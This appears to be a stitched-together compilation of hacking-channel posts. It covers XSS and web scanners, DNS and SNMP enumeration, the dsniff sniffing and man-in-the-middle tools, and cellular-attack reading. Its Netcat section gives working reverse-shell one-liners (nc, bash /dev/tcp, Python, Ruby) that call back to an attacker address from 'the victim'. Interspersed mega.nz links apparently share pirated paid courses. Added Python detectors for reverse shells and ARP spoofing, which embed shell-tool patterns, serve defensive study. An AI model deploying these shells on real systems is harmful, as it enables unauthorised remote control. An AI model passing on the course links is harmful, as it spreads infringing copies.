------------------------------
XSStrike: most advanced XSS scanner (8k stars on GitHub):
FEATURES:
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload encoding
OS:
> Debian-based (Kali, Parrot, Ubuntu, ...)
INSTALLATION & RUN:
1) git clone https://github.com/s0md3v/XSStrike
2) cd XSStrike
3) python xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES:
4) Scan a single URL
Option: -u or --url
5) Test a single webpage which uses the GET method:
python xsstrike.py -u "http://example.com/search.php?q=query"
6) Supplying POST data:
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7) Testing URL path components
Option: --path
8) To inject payloads into the URL path, like http://example.com/search/<payload>, use the --path switch:
python xsstrike.py -u "http://example.com/search/form/query" --path
9) Treat POST data as JSON
Option: --json
This switch can be used to test JSON data sent via the POST method (note that the closing quote belongs after the JSON body, before --json):
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}' --json
10) Crawling
Option: --crawl
For more, type -h
------------------------------
Review and Manage the SAP MRP List (244 MB)
https://www.linkedin.com/learning/review-and-manage-the-sap-mrp-list
https://mega.nz/#F!vs9D3K5R!9Lg6-Qf5hb-7-T-Oe-j01Q
------------------------------
#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular Paging Protocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSuper - a tool for capturing 2G-4G air traffic on Qualcomm-based phones](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
------------------------------
#DNS Reconnaissance:
1) DNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2) Reverse lookup for an IP range:
./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50
3) Retrieve standard DNS records:
./dnsrecon.rb -t std -d example.com
4) Enumerate subdomains (brute force from a word list):
./dnsrecon.rb -t brt -d example.com -w hosts.txt
5) DNS zone transfer:
./dnsrecon -d example.com -t axfr
6) Parsing Nmap reverse DNS lookups into a "hostname ip" list (Nmap prints "Nmap scan report for host (ip)", so fields 5 and 6 are kept and the parentheses stripped):
nmap -R -sL -Pn --dns-servers <dns-server> <ip-range> | awk '{if (($1" "$2" "$3)=="Nmap scan report") print $5" "$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt
------------------------------
------------------------------
#Netcat Linux Reverse Shell:
1) Netcat
nc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to. 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2) Netcat Reverse Shell (cmd.exe)
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to. 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3) Using Bash
bash -i >& /dev/tcp/10.10.10.10/888 0>&1
4) Using Python
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"])'
5) Using Ruby
ruby -rsocket -e 'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
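As an added defensive example (not part of the original post), the following Python scans process-creation events for the four reverse-shell shapes listed above and reports the callback destination each one would use; the event records, rule names and field layout are assumptions constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed process-creation events for this example (not real telemetry).
# The first four mirror the one-liners in the post; the last two are benign look-alikes.
SAMPLE_EVENTS = [
    {"pid": 4011, "user": "www-data",
     "cmdline": "nc 10.10.10.10 888 -e /bin/sh"},
    {"pid": 4012, "user": "www-data",
     "cmdline": "bash -i >& /dev/tcp/10.10.10.10/888 0>&1"},
    {"pid": 4013, "user": "www-data",
     "cmdline": ("python -c 'import socket,subprocess,os;"
                 "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                 "s.connect((\"10.10.10.10\",888));"
                 "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
                 "p=subprocess.call([\"/bin/sh\",\"-i\"])'")},
    {"pid": 4014, "user": "www-data",
     "cmdline": ("ruby -rsocket -e 'f=TCPSocket.open(\"10.10.10.10\",888).to_i;"
                 "exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'")},
    {"pid": 4015, "user": "alice", "cmdline": "nc -zv mail.example.internal 25"},
    {"pid": 4016, "user": "alice",
     "cmdline": "python -c 'import json,sys;print(json.load(sys.stdin))'"},
]

# Detection rules keyed on the shape of each technique, not on any particular
# IP or port: netcat with -e/-c, a bash /dev/tcp redirect, a Python socket whose
# descriptors are dup2'ed onto a shell, and a Ruby TCPSocket handed to exec.
RULES: List[Tuple[str, re.Pattern]] = [
    ("netcat_exec_shell",
     re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[ce]\s+\S*(?:sh|cmd\.exe)\b")),
    ("bash_dev_tcp_redirect",
     re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d{1,5}")),
    ("python_socket_dup2_shell",
     re.compile(r"socket\.socket\(.*dup2\(.*(?:/bin/(?:ba)?sh|subprocess)", re.S)),
    ("ruby_tcpsocket_exec_shell",
     re.compile(r"TCPSocket\.open\(.*\bexec\b.*/bin/(?:ba)?sh", re.S)),
]

# Patterns that pull the callback host and port out of each shape.
DEST_PATTERNS = [
    re.compile(r"\b(?:nc|ncat|netcat)\s+(?:-\S+\s+)*([\w.\-]+)\s+(\d{1,5})\b"),
    re.compile(r"/dev/(?:tcp|udp)/([\w.\-]+)/(\d{1,5})"),
    re.compile(r"connect\(\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d{1,5})\s*\)\)"),
    re.compile(r"TCPSocket\.open\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d{1,5})\s*\)"),
]


def classify(cmdline: str) -> Optional[str]:
    """Return the name of the first matching rule, or None for a benign command line."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def extract_destination(cmdline: str) -> Optional[Tuple[str, int]]:
    """Best-effort (host, port) that the shell would call back to."""
    for pattern in DEST_PATTERNS:
        match = pattern.search(cmdline)
        if match:
            return match.group(1), int(match.group(2))
    return None


def find_reverse_shells(events: List[Dict]) -> List[Dict]:
    """Run every event through the rules and return one alert per hit."""
    alerts = []
    for event in events:
        rule = classify(event["cmdline"])
        if rule is None:
            continue
        alerts.append({
            "pid": event["pid"],
            "user": event["user"],
            "rule": rule,
            "destination": extract_destination(event["cmdline"]),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_shells(SAMPLE_EVENTS):
        print(alert)
```

The destination is what a responder pivots on next: block it at the egress firewall and search for other hosts that talked to it.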
------------------------------
Build your first Microservices application using Go and gRPC (Golang) (1.36 GB)
https://www.udemy.com/course/microservices-go-grpc/
https://mega.nz/folder/tMJSgALb#ud27D8Fy-uYWgCPLdX69PA
------------------------------
#Useful SNMP Commands
(each walk assumes the target answers SNMPv1 with the community string "public"; replace <ip> with the host to query)
1) Search for Windows installed software:
snmpwalk -c public -v1 <ip> 1.3 | grep hrSWInstalledName
2) Search for Windows users (LanManager MIB user table, OID fragment 77.1.2.25):
snmpwalk -c public -v1 <ip> 1.3 | grep 77.1.2.25 | cut -d" " -f4
3) Search for Windows running services:
snmpwalk -c public -v1 <ip> 1 | grep hrSWRunName | cut -d" " -f4
4) Search for Windows open TCP ports:
snmpwalk -c public -v1 <ip> 1.3 | grep tcpConnState | cut -d" " -f6 | sort -u
------------------------------
2020 updated web server scanner (Nikto):
INSTALLATION & RUN:
1) git clone https://github.com/sullo/nikto
# Main script is in program/
2) cd nikto/program
# Run using the shebang interpreter
3) ./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4) perl nikto.pl -h http://www.example.com
Run as a Docker container:
1) git clone https://github.com/sullo/nikto.git
2) cd nikto
3) docker build -t sullo/nikto .
# Call it without arguments to display the full help
4) docker run --rm sullo/nikto
# Basic usage
5) docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6) docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
------------------------------
Important hacking tool terms (the dsniff suite):
1) arpspoof
Redirects packets from a target host (or all hosts) on the LAN intended for another local host by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. Kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragroute) must be turned on ahead of time.
2) dnsspoof
Forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3) dsniff
Password sniffer. Handles FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL auth info.
4) dsniff automatically detects and minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. Full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).
5) filesnarf
Saves selected files sniffed from NFS traffic in the current working directory.
6) macof
Floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program.
7) mailsnarf
A fast and easy way to violate the Electronic Communications Privacy Act of 1986 (18 USC 2701-2711), be careful. Outputs selected messages sniffed from SMTP and POP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail -f, pine, etc.).
8) msgsnarf
Records selected messages from sniffed AOL Instant Messenger, ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9) sshmitm
SSH monkey-in-the-middle. Proxies and sniffs SSH traffic redirected by dnsspoof(8), capturing SSH password logins, and optionally hijacking interactive sessions. Only SSH protocol version 1 is (or ever will be) supported - this program is far too evil already.
10) sshow
SSH traffic analysis tool. Analyzes encrypted SSH-1 and SSH-2 traffic, identifying authentication attempts, the lengths of passwords entered in interactive sessions, and command line lengths.
11) tcpkill
Kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-way handshake for TCB creation).
12) tcpnice
Slows down specified TCP connections via "active" traffic shaping. Forges tiny TCP window advertisements, and optionally ICMP source quench replies.
13) urlsnarf
Outputs selected URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).
14) webmitm
HTTP / HTTPS monkey-in-the-middle. Transparently proxies and sniffs web traffic redirected by dnsspoof(8), capturing most "secure" SSL-encrypted webmail logins and form submissions.
15) webspy
Sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). A fun party trick.
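As an added defensive example (not from the original post or the dsniff project), the following Python watches a stream of ARP replies for the two things forged replies such as arpspoof's produce on a segment: an IP whose advertised MAC changes, and a single MAC answering for several IPs. The reply records and the gateway address are constructed assumptions for this example.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed ARP reply observations for this example: (seconds, sender IP, sender MAC).
# A passive sensor would collect these from ARP "is-at" frames on the segment.
SAMPLE_ARP_REPLIES: List[Tuple[float, str, str]] = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # legitimate gateway
    (0.5, "192.168.1.20", "aa:bb:cc:00:00:20"),  # workstation
    (1.0, "192.168.1.30", "aa:bb:cc:00:00:30"),  # another host on the LAN
    (5.0, "192.168.1.1", "aa:bb:cc:00:00:30"),   # .30's MAC now claims the gateway IP
    (5.1, "192.168.1.20", "aa:bb:cc:00:00:30"),  # ... and the workstation's IP
    (7.0, "192.168.1.1", "aa:bb:cc:00:00:30"),   # repeated forged reply, no new change
]

GATEWAY_IP = "192.168.1.1"  # assumed for this example


def detect_arp_spoofing(replies, gateway_ip: Optional[str] = None) -> List[Dict]:
    """Return alerts for IP->MAC changes and for one MAC answering for many IPs."""
    alerts: List[Dict] = []
    history: Dict[str, List[str]] = defaultdict(list)  # ip -> MACs seen, in order of change

    for ts, ip, mac in replies:
        seen = history[ip]
        if seen and mac != seen[-1]:
            alerts.append({
                "time": ts, "ip": ip, "old_mac": seen[-1], "new_mac": mac,
                # A changed gateway binding is the classic man-in-the-middle setup.
                "kind": "gateway_mac_changed" if ip == gateway_ip else "ip_mac_changed",
            })
        if not seen or mac != seen[-1]:
            seen.append(mac)

    # One interface legitimately answering for several IPs (a router with aliases) is
    # possible, so treat this as a lower-confidence signal and let the operator whitelist.
    claimed: Dict[str, set] = defaultdict(set)
    for ip, macs in history.items():
        for mac in macs:
            claimed[mac].add(ip)
    for mac, ips in sorted(claimed.items()):
        if len(ips) > 1:
            alerts.append({"kind": "one_mac_many_ips", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES, GATEWAY_IP):
        print(alert)
```

Static ARP entries for the gateway and dynamic ARP inspection on the switch remove the condition this detector looks for rather than merely reporting it.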
------------------------------
Social-Engineer Toolkit 2020 updated:
INSTALLATION & RUN:
1) git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
2) cd setoolkit
3) pip3 install -r requirements.txt
4) python setup.py
OS:
> Linux
> Mac OS X (experimental)
5) For full usage, see this PDF (recommended if you are a beginner):
> https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf
------------------------------
Paros: a Java-based HTTP/HTTPS proxy
> for assessing web application vulnerabilities.
> It supports editing/viewing HTTP messages on the fly. Other features include spiders, client certificates, proxy chaining, intelligent scanning for XSS and SQL injection, etc.
For Windows, Linux and Mac:
> https://sourceforge.net/projects/paros/files/latest/download
------------------------------
What can this project (OWASP WebScarab) do in hacking?
> Download:
https://wiki.owasp.org/index.php/Category:OWASP_WebScarab_Project
FEATURES:
> Fragments - extracts scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins.
> Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.
> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.
> BeanShell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.
> Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible and editable.
> Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.
> Spider - identifies new URLs on the target site, and fetches them on command.
> Manual request - allows editing and replay of previous requests, or creation of entirely new requests.
> SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.
> Scripted - operators can use BeanShell (or any other BSF-supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.
> Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.
> Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
> Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.
> SOAP - there is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: this plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that WebScarab can do, or will ever do, and is
> Extensions - automates checks for files that were mistakenly left in the web server's root directory (e.g. .bak, ~, etc). Checks are performed for both files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by the user.
> XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.
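As an added example, not WebScarab's own code, the following Python reproduces the idea behind the Compare plugin described above: Levenshtein edit distance over word tokens between each observed response body and a chosen baseline, so that a response differing only in the reflected value ranks next to the baseline while an error page ranks far from it. The response bodies are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed response bodies for this example (not captured traffic).
BASELINE = ("<html> <body> <h1>Search results</h1> "
            "<p>Showing 0 results for <b>query</b></p> </body> </html>")

RESPONSES: Dict[str, str] = {
    # Same page again: the application is stable for the baseline value.
    "replayed_baseline": BASELINE,
    # Only the reflected parameter value changed: one token differs.
    "different_term": ("<html> <body> <h1>Search results</h1> "
                       "<p>Showing 0 results for <b>other</b></p> </body> </html>"),
    # A server error page: most of the body is different.
    "server_error": ("<html> <body> <h1>Error</h1> "
                     "<p>Database error near 'query' at line 1</p> </body> </html>"),
}


def word_tokens(body: str) -> List[str]:
    """Split a body on whitespace; tags, words and punctuation all become tokens."""
    return re.findall(r"\S+", body)


def token_edit_distance(a: List[str], b: List[str]) -> int:
    """Levenshtein distance between two token sequences (two-row dynamic programme)."""
    if len(a) < len(b):
        a, b = b, a  # keep the inner row the shorter sequence
    previous = list(range(len(b) + 1))
    for i, token_a in enumerate(a, 1):
        current = [i]
        for j, token_b in enumerate(b, 1):
            cost = 0 if token_a == token_b else 1
            current.append(min(previous[j] + 1,          # delete token_a
                               current[j - 1] + 1,       # insert token_b
                               previous[j - 1] + cost))  # substitute or match
        previous = current
    return previous[-1]


def compare_to_baseline(baseline: str, responses: Dict[str, str]) -> List[Tuple[str, int]]:
    """Rank responses by their word-token edit distance from the baseline, nearest first."""
    base = word_tokens(baseline)
    ranked = [(name, token_edit_distance(base, word_tokens(body)))
              for name, body in responses.items()]
    return sorted(ranked, key=lambda item: (item[1], item[0]))


if __name__ == "__main__":
    for name, distance in compare_to_baseline(BASELINE, RESPONSES):
        print(f"{distance:4d}  {name}")
```

A sudden jump in distance for one fuzzed value is the cue to open that conversation and read the response by hand.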
------------------------------
Process Visualization with HMI / SCADA (PLC III) (4.03 GB)
https://www.udemy.com/course/hmi-scada/
https://mega.nz/folder/faZFEIpa#fakaZBlX0KfHPG0fKQgilQ
------------------------------
#Vulnerable Servers:
> There is a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers).
#How to Integrate OWASP ZAP with Jenkins:
- You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug-in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin).
- [This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate
#Docker Security
- [OWASP Docker security resources](https://github.com/OWASP/Docker-Security)
- [Docker Bench for Security](https://github.com/docker/docker-bench-security)
- [Dockerscan](https://github.com/cr0hn/dockerscan)
- [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground)
#JavaScript Tools:
* [Retire.js](https://retirejs.github.io/retire.js)
Working with Android Tools and Testing (Pluralsight)
https://www.pluralsight.com/courses/android-tools-testing
https://mega.nz/#F!ptxVQRzZ!N4jRKcMHP9_ScG5l9vE3uQ